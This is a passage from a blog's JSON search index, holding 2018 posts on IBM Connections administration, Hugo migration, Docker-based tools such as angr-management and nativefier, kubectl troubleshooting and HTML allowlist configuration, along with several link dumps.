outages, but when a LDAP server provides wrong or short returns, these are valid and do not force a switch to other LDAP server.\nAs best practise I learned that I could save a lot of time, when WebSphere fixpacks and interim fixes are deployed seperatly, not in one big step. For example you can install WebSphere 8.5.5.13 with some IFP in one step, just with adding the repositories in Installation Manager. When you want to do a rollback, this is not possible. So installing first 8.5.5, then Fixpack 13 and in a third step the IFP creates 2 possible rollback positions.\n","excerpt":"\u003cp\u003eToday I learned a new lesson during troubleshooting a IBM Connections System.\nI updated to 6.0 CR2, updated WebSphere to FP13, last fixpack for Docs and so on.\nYou will ask if I added \u003ca href=\"https://www-01.ibm.com/support/docview.wss?rs=180\u0026amp;uid=swg1PI88438\" target=\"_blank\"\u003eIFP88438 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to the list, be sure that I installed this fix which reanables the \u003ccode\u003eroot\u003c/code\u003e element in Federated Repositories.\nHave a look at \u003ca href=\"https://techblog.gis-ag.info/2017/12/21/was-8-5-5-fp12-breaks-domino-root-base-entry-setting/\" target=\"_blank\"\u003eWAS 8.5.5 FP12 breaks Domino \u0026ldquo;root\u0026rdquo; base entry setting \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for more details.\u003c/p\u003e\n\u003cp\u003eThen one of the two deployments showed strange behavior with Activities.\nOn the Activitystream I only got an orange error symbol instead of the Todo list and when I opened Activities directly I got an empty page.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180816-always-check-the-ldap/","title":"Always have a look at the LDAP"},{"body":"I switched my blog to Hugo the last days. After nearly 12 years with WordPress , I needed something new. Why did I drop WordPress, one of the most used blog engines in the world?\nMost used means always most interesting for bad guys. Dynamic pages are slower and can contain more vulnerabilities than static pages (which Hugo generates). Hugo supports git, so I have version control in my posts and design. I can start a small web server locally and test the posts: hugo server -D and the most convenient thing: I can use VIM for editing.\nVIM is THE editor for me, I tried using it with vim-anywhere with my browsers, but it’s still not the same.\nThe last years I wrote most of my blog posts in markdown , but most of my other writing is done with asciidoc . The WP markdown plugin was quite good, but I never was happy with the ones for asciidoc. So I converted my writing with pandoc and uploaded it to WordPress. I prefer asciidoc over markdown, because I can do way more things (like include source files in my documentation) and it is still easy readable in any editor. The tool for working with asciidoc sources is asciidoctor !\nHugo Helpers support markdown, restructured Text, pandoc and asciidoctor . So no conversion needed during writing.\nMigration I used https://github.com/SchumacherFM/wordpress-to-hugo-exporter to convert all WordPress posts to markdown. This export can directly be used with your new Hugo site. I tweaked some more stuff, because I wanted to use asciidoc for all posts, so I converted everything with pandoc to asciidoc. Then I adjusted some text which was not WP default (like syntax highlighted source, some links) with sed.\nSo all old posts are migrated and available with their old URL! Nothing to tweak or change in Apache or .htaccess. Users from search engines get directly to the posts.\nThe only thing I did not migrate were comments on posts and I will not enable discuss comments with Hugo. If you want to discuss something with me, write on Twitter or drop me a mail.\nHugo offers a lot of themes , I decided to use a bootstrap enabled one . I forked the theme and updated to a new https://fontawesome.com version, added some parameters to enable or disable sharing icons. Some little CSS adjustments for asciidoc paragraph elements like WARNING or NOTE are needed too.\nFroscon In August I will give a talk at https://froscon.org about asciidoc and using any editor for documentation. So more details on asciidoc(tor) will follow.\nDocker Asciidoctor is also available as a docker image , so it is easiest to use and you needn’t install a ton of requirements or dependencies. Or you can use it within your build pipeline to have a up-to-date documentation.\n","excerpt":"\u003cp\u003eI switched my blog to \u003ca href=\"https://gohugo.io\" target=\"_blank\"\u003eHugo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n the last days. After nearly 12 years with \u003ca href=\"https://wordpress.com\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, I needed something new.\nWhy did I drop WordPress, one of the \u003ca href=\"https://w3techs.com/\" target=\"_blank\"\u003emost used blog engines \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the world?\u003c/p\u003e\n\u003cp\u003eMost used means always most interesting for bad guys.\nDynamic pages are slower and can contain more vulnerabilities than static pages (which Hugo generates).\nHugo supports git, so I have version control in my posts and design.\nI can start a small web server locally and test the posts: \u003ccode\u003ehugo server -D\u003c/code\u003e and the most convenient thing: \u003cstrong\u003eI can use \u003ca href=\"https://www.vim.org\" target=\"_blank\"\u003eVIM \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for editing.\u003c/strong\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-07-14-new-blog-engine/","title":"New Blog Engine"},{"body":"A long pause after creating the last linkdump. Not sure why, because I read a lot. So this time some of my readings on Kubernetes, Security and Vim.\n* Interesting career: Lessons from My Strange Journey into InfoSec * Developer Tools are very useful for all kind of users. I like them to troubleshoot webpages, IBM Connections and more. Essential Chrome Developer Tools: Beginner to Master * Replacement for WebSphere and JBoss? Why Kubernetes is The New Application Server - RHD Blog * Some networking for Kubernetes. Think Before you NodePort in Kubernetes - Oteemo * Maybe to late for me (on the crazy part). How to Use Slack and Not Go Crazy | Inside PSPDFKit * Basics about writing good shell scripts. 13 Tips \u0026amp; Tricks for Writing Shell Scripts with Awesome UX * I think I work mostly on the console within tmux or ssh sessions. ZSH is great to speed me up and gives me a colorful fast console. How to Setup ZSH and Oh-my-zsh on Linux * Jupyter notebooks are great to get python or analytics into powerful and dynamic documents, but it also very useful with scripts, SQL and so on. Jupyter: notebooks for education and collaboration * A new topic for me, but a good starting point on Deep Learning. A “weird” introduction to Deep Learning * I use it little longer, now after 15 years it feels familar, but every minute is worth invested into learning VIM. You can get very very fast. Nine months with Vim * Interesting for vim users, but also for managing dotfiles and projects with sub git repositories. git submodule is really cool and I long ignored it. Synchronizing plugins with git submodules and pathogen * German, but quite interesting: DevOps als Treiber für agiles und schlankes IT-Servicemanagement Addition - not a read, but watch it Since my last post Martin Leyrer did a really interesting and entertaining talk during Gulasch Programmiernacht . If you wanna learn new commandline tools and extend your console knowledge, watch it!\nIt’s in austrian/viennese!\nModerne Kommandozeilen Werkzeuge auf der GPN18\u0026quot;\u0026gt;Recording des GPN18 Vortrags auf media.ccc.de Slidedeck Moderne Kommandozeilen Werkzeuge @ GPN18 ","excerpt":"\u003cp\u003eA long pause after creating the last linkdump. Not sure why, because I read a lot.\nSo this time some of my readings on Kubernetes, Security and Vim.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-07-13-linkdump-4-2018/","title":"Linkdump 4/2018"},{"body":"IBM Docs Viewer can open source files with syntax highlighting. This feature is default disabled, but sometimes very useful.\nYou need to enable it with IBM Connections Gatekeeper.\nBe aware that most of Gatekeeper settings are not officially supported by IBM and can have side effects! Open Gatekeeper with https://your-connections-fqhn/connections/config\nNow search for FILEVIEWER_PREVIEW_TEXT and change the value to True.\nNow when you open an html (or other text file) from IBM Connections Files it will open a preview and after a short flickering of the document the source is highlighted.\nWithout that setting you just see a message like “no preview available for this” and a download option:\nGatekeeper settings can be set in real-time, so no restart of Connections is needed to enable or disable this feature. I tested the preview with html, js and css, but I think nearly everything with mime-type text is possible.\nUpdate 2018-06-15 You need the admin role of the Common Application to access the gatekeeper!\n","excerpt":"\u003cp\u003eIBM Docs Viewer can open source files with syntax highlighting. This feature is default disabled, but sometimes very useful.\u003c/p\u003e\n\u003cp\u003eYou need to enable it with IBM Connections Gatekeeper.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-06-14-enable-preview-for-source-files-like-html-or-css-with-ibm-docs-viewer/","title":"Enable Preview for source files like html or css with IBM Docs Viewer"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/file-viewer/","title":"File Viewer"},{"body":"Watson Workspace Clients are only available for Windows and Mac OS. I’m a 100% Linux user on my devices and I use a Windows virtual machine only if I can’t avoid it. To communicate with colleagues, IBM and DNUG I need to use Watson Workplace, opening the web view is possible, but then I need to search the right tab or forget to open it. Since some weeks there is Zoom (Web / Video meetings) integrated with Watson Workspace too.:\nWatson Workspace clients are based on Electron . I’m not a big fan of Electron clients, most of them are big and need tons of system resources. There is enough written about advantages and disadvantages, so I just leave it that way.\nThe last time I used Rambox and configured for Smartcloud, some Slack spaces and Watson Workplace, but I wasn’t completely satisfied. I’m a member of around 12 Slack spaces, so I switched back to the native Slack client and uninstalled Rambox. I just wanted something to use Watson Workplace outside of my browsers. One reason is the single sign-on feature within the IBM web pages. I use several IBM IDs to download software, use Smartcloud Connections or Developerworks. So an always logged in WW and the very sticky cookies around these services are a pain.\nToday I found a new way! I read about nativefier in my news feed and just wanted to try using it.\nThe project is based on Node.js and uses npm for installation. Node.js has lots of dependencies and I don’t want to have all that tools on my working machine. So I cloned the repository and build the docker image.\ngit clone https://github.com/jiahaog/nativefier.git cd nativefier docker build -t local/nativefier . Now I can build everything from that docker container.\nI downloaded a Watson logo and put it on the path where I want to build the client.\ncd ~ mkdir -p ~/tools/watsonworkspace cp Downloads/ww-logo.png ~/tools/watsonworkspace cd ~/tools Build the application docker run --rm \\ -v $(pwd)/watsonworkspace:/target \\ local/nativefier \\ --icon /target/ww-logo.png \\ --name \u0026#34;Watson Workspace\u0026#34; \\ https://login.workspace.ibm.com/ \\ /target/ Start docker, run a container based on image local/nativefier and delete (--rm) the container after the run.\nThis maps a volume from local path /watsonworkspace and maps within the container to /target.\nAdds an icon to the program and adds the name Watson Workspace.\nIs the login URL of Watson Workspace. When you log in there and restart the client, you’re still logged on.\nAfter running the container you find a new directory with ~/tools/watsonworkspace and you can start your personal build Electron client with ~/tools/watsonworkspace/watson-workspace-linux-x64/watson-workspace. I created an autostart entry to start it each time I log in, or you can add it to the menu or desktop. The best thing about nativefier is, it works on Mac OS and Windows too. So you can add every URL you want to have a separate login or browser window.\nZoom on Linux Within the Workspace client, I can start a meeting (when I have a pro account) and I can open it directly with Zoom (which is available for Linux too). So it’s not integrated into my Workspace client, but it opens without prompting in a Zoom client window. Great stuff!\n","excerpt":"\u003cp\u003e\u003ca href=\"https://www.ibm.com/collaboration/collaboration-tools/watson-work/workspace\" target=\"_blank\"\u003eWatson Workspace \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Clients are only available for Windows and Mac OS. I’m a 100% Linux user on my devices and I use a Windows virtual machine only if I can’t avoid it.\nTo communicate with colleagues, IBM and DNUG I need to use Watson Workplace, opening the web view is possible, but then I need to search the right tab or forget to open it.\nSince some weeks there is \u003ca href=\"https://zoom.us/\" target=\"_blank\"\u003eZoom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (Web / Video meetings) integrated with Watson Workspace too.:\u003c/p\u003e\n\u003cp\u003eWatson Workspace clients are based on \u003ca href=\"https://electronjs.org\" target=\"_blank\"\u003eElectron \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I’m not a big fan of \u003ca href=\"https://electronjs.org\" target=\"_blank\"\u003eElectron \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n clients, most of them are big and need tons of system resources. There is enough written about advantages and disadvantages, so I just leave it that way.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-03-29-build-your-own-watson-workspace-linux-client/","title":"Build your own Watson Workspace Linux Client"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/watson-workspace/","title":"Watson Workspace"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/angr/","title":"Angr"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ctf/","title":"CTF"},{"body":"Today I have a topic from outside the yellow world.\n== Disclaimer\nAny actions and or activities related to the material contained within this Website and post is solely your responsibility.The misuse of the information on this website can result in criminal charges brought against the persons in question. The author and https://www.stoeps.de/ will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.\nSince several years I’m interested in IT Security. I do a lot of troubleshooting with so-called hacker tools, but they are really useful in my daily work life! So I started to learn more about this tools. Good resources to learn using Kali Linux, Burpsuite or Metasploit are vulnerable VMs or services like Hack the box . During this challenges and watching the videos of LiveOverflow I played with IDA Free and Radare2 to reverse special prepared binaries. Reading the disassembled code is not that hard, but a challenge.\nIn a video from Def Con 23 I heard the first time from angr and I like it very much. There is a GUI for it too, but I couldn’t install the dependencies on my Ubuntu machine. In Kali Linux it worked perfectly, but not on the local installation.\nOn Docker Hub you can download a ready installed container with the latest angr-management. This container uses your local X Server, so you need to use some parameters for the start and you can map a local path into the container that you can access the binaries:\ndocker run --name angr-mgmt -e QT_X11_NO_MITSHM=1 -e DISPLAY=$DISPLAY -v $PWD:/home/angr/pwd -v /tmp/.X11-unix:/tmp/.X11-unix angr/angr-management So what does this all mean?\n--name angr-mgmt: I give the container a name, so I can start it again with docker start angr-mgmt\n-e QT\\_X11\\_NO_MITSHM=1: Without that I got security errors during the X Server access, but in that thread I got the information that it’s faster to use –ipc host instead\n-e DISPLAY=$DISPLAY: Add environment variable $DISPLAY\n-v $PWD:/home/angr/pwd: map the path you’re now to the container path /home/angr/pwd\n-v /tmp/.X11-unix:/tmp/.X11-unix: map the local path to the container path to access X\nangr-management: name of the docker image\nFinal container command docker run --name angr-mgmt --ipc host -e DISPLAY=$DISPLAY -v $PWD:/home/angr/pwd -v /tmp/.X11-unix:/tmp/.X11-unix angr/angr-management Testing the software As a first test I opened a example binary from the angr documentation named crackme0x00a. That’s a very easy binary (used in lots of tutorials) , because the used string can be found as a string in the disassembled code, but I think you get a picture of angr:\nUpdate 2018-03-08 Today I tried some more things from the documentation and behind some links, I found: https://github.com/angr/angr-management/blob/master/run-docker.sh , so the Docker start can be done with the shell script on Github. There is a second one for Mac OS X too.\n","excerpt":"\u003cp\u003eToday I have a topic from outside the yellow world.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-03-07-running-angr-management-in-docker/","title":"Running Angr-Management In Docker"},{"body":"The last two weeks I didn’t read that much, I checked some Youtube videos and blogs about CTF and pentesting. One of the most impressive ones are the LiveOverflow videos and blogposts . So when you’re interested in that topic too, just check the links above.\n* A real good story on a fictive thread on the NodeJS ecosystem. * Awesome link collection all around CTF can be found on Github. * I often asked me that question, maybe you find the answer interesting too: Does It Help When I ‘Like’ My Company Facebook Posts? – Ben Brausen * That’s a big wish from me to implement this in the sooner future. Even as an administrator there are tasks you can automate, like building documentation from Asciidoc, or doing screenshot with selenium. Set Up a CI/CD Pipeline with Kubernetes Part 1: Overview ","excerpt":"\u003cp\u003eThe last two weeks I didn’t read that much, I checked some Youtube videos and blogs about \u003ca href=\"https://en.wikipedia.org/wiki/Capture_the_flag\" target=\"_blank\"\u003eCTF \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and pentesting. One of the most impressive ones are the \u003ca href=\"https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w\" target=\"_blank\"\u003eLiveOverflow videos \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://liveoverflow.com\" target=\"_blank\"\u003eblogposts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. So when you’re interested in that topic too, just check the links above.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-03-07-linkdump-3-2018/","title":"Linkdump 3/2018"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/pentesting/","title":"Pentesting"},{"body":"And the second linkdump with contents I read that week.\nI don’t like the idea, sounds very 1984: Wi-Fiber is creating safer cities by combining wireless tech, smart streetlights Never tried multi-stage Dockerfiles, but sounds interesting to get red of libraries and installer files: Fun with Multi-stage Dockerfiles Most interesting for me was the part about the available docker images carpedm20/awesome-hacking I use Shaarli to store links (on mobile and my computers), which are not saved to my Readlater stuff in Wallabag, but I will give the console tool Buku a chance next week. Need to check the browser integration and sharing from mobile. jarun/Buku jensvoid/lorg is a tool for advanced HTTPD logfile security analysis and forensics\nQuite nice console extension to see the git status: michaeldfallen/git-radar , I will stay with my plugin for zsh in the moment, but when you haven’t an integration, give it a try.\nInsanely complete Ansible playbook, showing off all the options , really insane how many valuable comments are stored in that Ansible file, great write-up and a ton to learn from this.\nNice blogpost on Five Questions: Testing Ansible Playbooks \u0026amp; Roles Important and quite easy: Validate XML against a XSD with Notepad + + , if you don’t wanna use xmllint, use the integration in notepad + +, so you can find errors in your XML files. I use that to confirm IBM Connections configuration documents against their XSD, to prevent using wsadmin and check them out.\nNext two points, some details on Nginx, Load Balancing and differences to Apache.\nTCP and UDP Load Balancing with Nginx: Tips and Tricks Apache vs Nginx: Practical Considerations ","excerpt":"\u003cp\u003eAnd the second linkdump with contents I read that week.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eI don’t like the idea, sounds very 1984:\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2018/2018-02-18-linkdump-2-2018/","title":"Linkdump 2/2018"},{"body":"I’m not sure how long ago I started following Dirk Deimekes Blog . It must be years, because I found the rss feed address already in my Google reader export.\nFirst of all I need to thank him, it is always a good read and that’s the reason I want to adopt one of his weekly habits – the linkdump . Not sure if I can do that weekly, but will try to post a linkdump of the best articles I read from my wallabag list. It will cover nearly everything I do, so working, IBM, Security and so on.\nVim-Galore is a cool intro and reference to my favorite editor.\nDisable HTTP trace in Apache shows an important point to give the smallest footprint possible.\nHTTPie is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. So if you can’t talk HTTP in telnet, that’s a nice tool.\nDoing your own SSL/TLS testing gives a good intro to the most important parts of SSL security. I like that tool, because you can run it without internet or public accessible host and it gives you more information than nmap ssl-enum-ciphers or Openssl .\nDuring Social Connections 12 in Vienna I showed a starter on ansible to prepare and install software. Here the Best practices to build great Ansible playbooks I do more and more security and forensic things the last years and so I use the tools for troubleshooting and analyze ICS software too. A good tool to record network traffic on servers is tcpdump, which writes pcap and so can be analyzed with Python Scapy or Wireshark . A tcpdump Tutorial and Primer with Examples How “Exit Traps” Can Make Your Bash Scripts Way More Robust And Reliable Containers and microservices get more important each day – 50+ useful Docker tools An interesting write-up on IoT in our houses and flats. Have a look at it and think about if you need a cam which sends your naked butt to a cloud service. The house that spied on me More links: The complete list of Infosec related cheat sheets So that’s the first linkdump. Hope you like it.\n","excerpt":"\u003cp\u003eI’m not sure how long ago I started following\n\u003ca href=\"https://www.deimeke.net/dirk/blog\" target=\"_blank\"\u003eDirk Deimekes Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. It must be years,\nbecause I found the rss feed address already in my Google reader export.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-02-11-linkdump-1-2018/","title":"Linkdump 1/2018"},{"body":":icons: font\nAfter some deployments of IBM Connections pink and IBM Cloud private, I want to share some tools, links and hopefully helpful information around these products.\nSources to start with troubleshooting Orientme Blogs: Nico Meisenzahl Socially Integrated IBM Think: Two Wrongs Don’t Make a Right—Troubleshooting IBM Connections IBM Technotes: If Redis is not reachable, Indexing and Analysis tries to reconnect for 8 times and then fails Mongo and Redis Pods in an Unknown State Some shortcuts, commands and tools During my reading and researches, I optimized some of the shown scripts in the above mentioned links. On the other side I hate to open logs in each single pod, so I searched for a better solution.\nGetting the logs of multiple pods On the command line you can just use kubetail . Just download this script to your master node of IBM Cloud private. Move it to the PATH and make executable:\nwget https://raw.githubusercontent.com/johanhaleby/kubetail/master/kubetail sudo mv kubetail /usr/local/bin sudo chmod +x /usr/local/bin/kubetail With kubetail you get log messages in different colors for different pods.\nkubetail es-master -s 15s This shows the logs of the last 15 seconds of all elasticsearch pods and until you hit Ctrl+c you will get all new messages too.\nSet default namespace in CfC/ICP With Orientme 6.0.0.4 the namespace of all pink pods is moved from default to connections. So you need to add the namespace to each kubectl command you run on the console. So I like to change the default namespace for kubectl:\nkubectl config set-context $(kubectl config current-context) --namespace=connections To switch this back to the IBM default use:\nYou need to switch the default namespace back before you update your environment! The update script for 6.0.0.5 will not run properly when you set a different namespace!\nkubectl config set-context $(kubectl config current-context) --namespace=default To check which settings are used:\nkubectl config view Speed up the technote commands Mongo and Redis Pods in an Unknown State Original from Mongo and Redis Pods in an Unknown State kubectl get pods -n connections | grep redis-server kubectl get pods -n connections | grep mongo Or combine the two commands with:\nkubectl get pods -n connections | grep -E \u0026#34;redis-server|mongo\u0026#34; mongo-0 2/2 Unknown 0 19h mongo-1 2/2 Running 0 19h mongo-2 2/2 Running 0 19h redis-server-0 1/1 Running 0 19h redis-server-1 1/1 Unknown 0 19h redis-server-2 1/1 Running 0 19h None of the listed pods should have the state unknown. Resolving that issue:\nkubectl delete pod \u0026lt;pod name=\u0026#34;\u0026#34;\u0026gt; -n connections --grace-period=0 --force\u0026lt;/pod\u0026gt; For example:\nkubectl delete pod mongo-1 -n connections --grace-period=0 --force Or you automate it a little and delete all pods with state Unknown:\nkubectl delete pod $(kubectl get pods -n connections | grep -E \u0026#34;redis-server|mongo\u0026#34; | grep Unknown | awk \u0026#39;{print $1}\u0026#39;) -n connections --grace-period=0 --force Kubernetes will recreate the pod after a short time.\nIf Redis is not reachable, Indexing and Analysis tries to reconnect for 8 times and then fails\nOriginal from If Redis is not reachable, Indexing and Analysis tries to reconnect for 8 times and then fails kubectl get pods -n connections | grep -E \u0026#34;analysisservice|indexingservice\u0026#34; This will return a list of running pods:\nanalysisservice-132048526-bh02z 1/1 Running 4 2d analysisservice-132048526-dhm45 1/1 Running 3 2d indexingservice-3077571376-9b541 1/1 Running 0 3d indexingservice-3077571376-qvq7j 1/1 Running 3 3d indexingservice-3077571376-t61wh 1/1 Running 0 3d Check the logs (use kubetail) of these pods! If you see “Exception while connecting”, delete the pods and kubernetes will recreate them.\n# Show logs of all pods in the default namespace, including last 5 lines of each log kubetail --tail 5 # Show all logs on console and append output to logfile kubetail --tail 5 | tee -a logfile # This will show logs of indexingservice and analysisservice kubetail \u0026#39;(indexingservice|analysisservice)\u0026#39; -e regex -s 30s # Delete all indexingservice and analysisservice pods kubectl delete pod $(kubectl get pods -n connections | grep -E \u0026#34;analysisservice|indexingservice\u0026#34; | awk \u0026#39;{print $1}\u0026#39;) -n connections --grace-period=0 --force So next time I try to get all that directly from the ICP Admin Interface or Elasticsearch.\n","excerpt":"\u003cp\u003e:icons: font\u003c/p\u003e\n\u003cp\u003eAfter some deployments of IBM Connections pink and IBM Cloud private, I\nwant to share some tools, links and hopefully helpful information around\nthese products.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-02-07-troubleshooting-orientme-kubectl/","title":"Troubleshooting Orientme or a little bit kubectl"},{"body":"Here for example embedding a video to a blog post. Prerequist is that you’ve no fear to change some html source.\nUpload the video to the Files application in Connections All blog readers need to have access to the video file Easiest way is to upload to Community files and use it in the Community blog directly in this community Open the file within IBM Connections Docs Viewer and click on ABOUT – Get Links Copy the “Link to download file:” to the clipboard Now create a new blog post (add heading, tags, additional text) Switch to the HTML view in the post On the position where you want to add the video, add following source: \u0026lt;video src=\u0026#34;url from files viewer\u0026#34; controls=\u0026#34;\u0026#34; width=\u0026#34;640px\u0026#34;\u0026gt;\u0026lt;/video\u0026gt; Example: \u0026lt;video src=\u0026#34;https://connections.example.com/files/form/anonymous/api/library/6722626c-b14c-4f4e-80fc-f27f71ad2cb9/document/512adfd2-1d30-4a3d-92ee-13db1f5f0574/media/2018-01-22%20Call%20February%202016.mp4\u0026#34; controls=\u0026#34;\u0026#34; width=\u0026#34;640px\u0026#34; height=\u0026#34;480px\u0026#34;\u0026gt;\u0026lt;/video\u0026gt; Post the document Update Thanks to Urs for the comment, I updated the code so it is valid XHTML now.\n","excerpt":"\u003cp\u003eHere for example embedding a video to a blog post. Prerequist is that\nyou’ve no fear to change some html source.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-02-05-embed-uploaded-videos-to-ibm-connections-blog-post-or-wiki-page/","title":"Embed uploaded videos to IBM Connections blog post or wiki page"},{"body":"So up to IBM Connections 6.0 everything was allowed until it was not excluded in one of the blocklist files. This files are stored within the Deployment Manager profile/config/cells/\u0026lt;cellname\u0026gt;/LotusConnections-config/extern. Now with Connections 6.0CR1 everything is forbidden, until it is enabled in the allowlist. This concept is rolled out for widgets (homepage and communities) and active content. Active content means HTML content too. So everything you or your users add to Connections (blog-posts, wiki pages) gets filtered during the save procedure. This removes all HTML tags and attributes which are not explicitly allowed!\nThe documentation and a tech-note show how to enable Communities and Homepage widgets. Martin Leyrer wrote a blog post on enabling links for IBM Notes through a custom allowlist. After enabling the custom allowlist and enabling notes:// links, I just thought about other topics which are not working as expected in IBM Connections 6.0CR1 and tried to find out if they can be solved with some add-ons to the allowlist.\nWikis TOC 2013 I wrote a blog post on (https://stoeps.de/posts/2013/activate-customize-table-of-contents-macro-in-ibm-connections-wiki/)[customizing the wiki table of contents]. This is still a useful feature and the customization and enablement procedure is working in 6.0CR1 too. I think it’s a important topic, because the post is one of the most read articles in this blog. After deploying IBM Connections 6.0CR1 the automatic update of the TOC is not working anymore. First of all we checked the JavaScript which is used to add the TOC, but the initial creation of a TOC was working, just updating after editing a page not. I created a wiki page, added some headings and a TOC. With the source/html view of the editor we see a div with name=\u0026quot;intInfo\u0026quot;.\n\u0026lt;div style=\u0026#34;border-radius: 6px; margin: 8px; padding: 4px; display: block; width: auto;background-color: #ffc;\u0026#34; name=\u0026#34;intInfo\u0026#34; contenteditable=\u0026#34;false\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt; Table of Contents: \u0026lt;ul style=\u0026#34;list-style-type:none !important;\u0026#34;\u0026gt;...\u0026lt;/ul\u0026gt; \u0026lt;/div\u0026gt; When we now save that page and check the HTML source again, we see that the name attribute and all other styles are vanished.\n\u0026lt;div contenteditable=\u0026#34;false\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt; Table of Contents: \u0026lt;ul\u0026gt;...\u0026lt;/ul\u0026gt; \u0026lt;/div\u0026gt; So the idea was now to add name to the allowlist. I think name is not a tag which can be malicious, so I just added it to the global part of the allowlist.\n\u0026lt;allowattributesglobally\u0026gt; \u0026lt;!-- assumed safe --\u0026gt; \u0026lt;elementAttribute name=\u0026#34;height\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; \u0026lt;elementAttribute name=\u0026#34;width\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; \u0026lt;elementAttribute name=\u0026#34;label\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; \u0026lt;elementAttribute name=\u0026#34;name\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; You need to restart your environment to enable the custom whitelist. I added a new TOC and after saving, the name-Attribute was still in the source.\n\u0026lt;div name=\u0026#34;intInfo\u0026#34; contenteditable=\u0026#34;false\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt; Table of Contents: \u0026lt;ul\u0026gt;...\u0026lt;/ul\u0026gt; \u0026lt;/div\u0026gt; So this problem is solved, but we need to get the other styles too.\nEditor formatting I tried some things more. When you add an image with Textbox.io or the CK Editor, you have the option to float that image to the left or right. Like the name attribute before, the img tag contains style=”float:right” which is not saved and the image flips to the left. I played with textbox.io and found that several markups are applied through the style attribute. As far as I can say all these changes gets lost during save, except the font-family. For example font-size and color were not saved. So when users formats their posts it can happen that they loose some of their formatting work. From a security point of view and when I look at corporate identity I like that, but I think we need an option to enable or disable special attributes in the allowlist. And when they are disabled, the editors (textbox and ck editor) must hide them! Maybe it would be an idea to highlight the text parts which contains not-whitelisted markup. I understand all users when they get angry after formatting a page or post and the expected WYSIWYG isn’t working. Or think about importing office documents which was one of the use cases of the first ephox editor, just text will be safe to import.\nAllowing style tag Within the allowlist you can enable attributes for special HTML tags:\n\u0026lt;!--•••\u0026lt;img\u0026gt;•••\u0026lt;image\u0026gt;•••--\u0026gt; \u0026lt;allowAttributesOnElements\u0026gt; \u0026lt;element name=\u0026#34;img\u0026#34; /\u0026gt; \u0026lt;element name=\u0026#34;image\u0026#34; /\u0026gt; \u0026lt;elementAttribute name=\u0026#34;align\u0026#34; /\u0026gt; ... \u0026lt;elementAttribute name=\u0026#34;style\u0026#34; /\u0026gt; ... \u0026lt;elementAttribute name=\u0026#34;lconnwikiparamwikipage\u0026#34; /\u0026gt; With allowed style I tried the float again. Now in the editor HTML view we see \u0026lt;img src... style=\u0026quot;float:right;margin:1 0 0 0;\u0026quot;... \u0026gt; Now this changes to style=\u0026quot;margin 1 0 0 0\u0026quot;, so there are two things to consider. The HTML tag and the attributes within style.\nallowlisting styles? The https://www.ibm.com/support/knowledgecenter/SSYGQH_6.0.0/admin/secure/sec_acf_whitelist_styling.html[allowlist documentation] is a little bit … short and wrong. The documentation shows this snippet\n\u0026lt;allowstyling\u0026gt; \u0026lt;param cssSchema=\u0026#34;css_schema\u0026#34; /\u0026gt; \u0026lt;/allowstyling\u0026gt; And the part of the documentation should help to add css tags and attributes stored in style=... When I added this snippet to the allowlist the first time, I couldn’t open the editor or create a community any more, because of validation errors. So I checked the used xsd of the allowlist and validated with xmllint. I used this command command directly from the extern directory.\nxmllint -schema ojhs-whitelist.xsd ojhs-whitelist-custom.ml --noout After some tries and reading the xsd again, I found the following snippet is valid and should work with any CSS schema, but I’m still not able to add allowed CSS styles. Maybe one of you can help out here.\nValid XML, but still not working \u0026lt;allowstyling\u0026gt; \u0026lt;param value=\u0026#34;float\u0026#34; /\u0026gt; \u0026lt;/allowstyling\u0026gt; Tried that too, but getting Java class errors \u0026lt;allowstyling cssSchema=\u0026#34;CSS 3.0\u0026#34;\u0026gt; \u0026lt;!-- tried several strings here, but without success --\u0026gt; \u0026lt;param 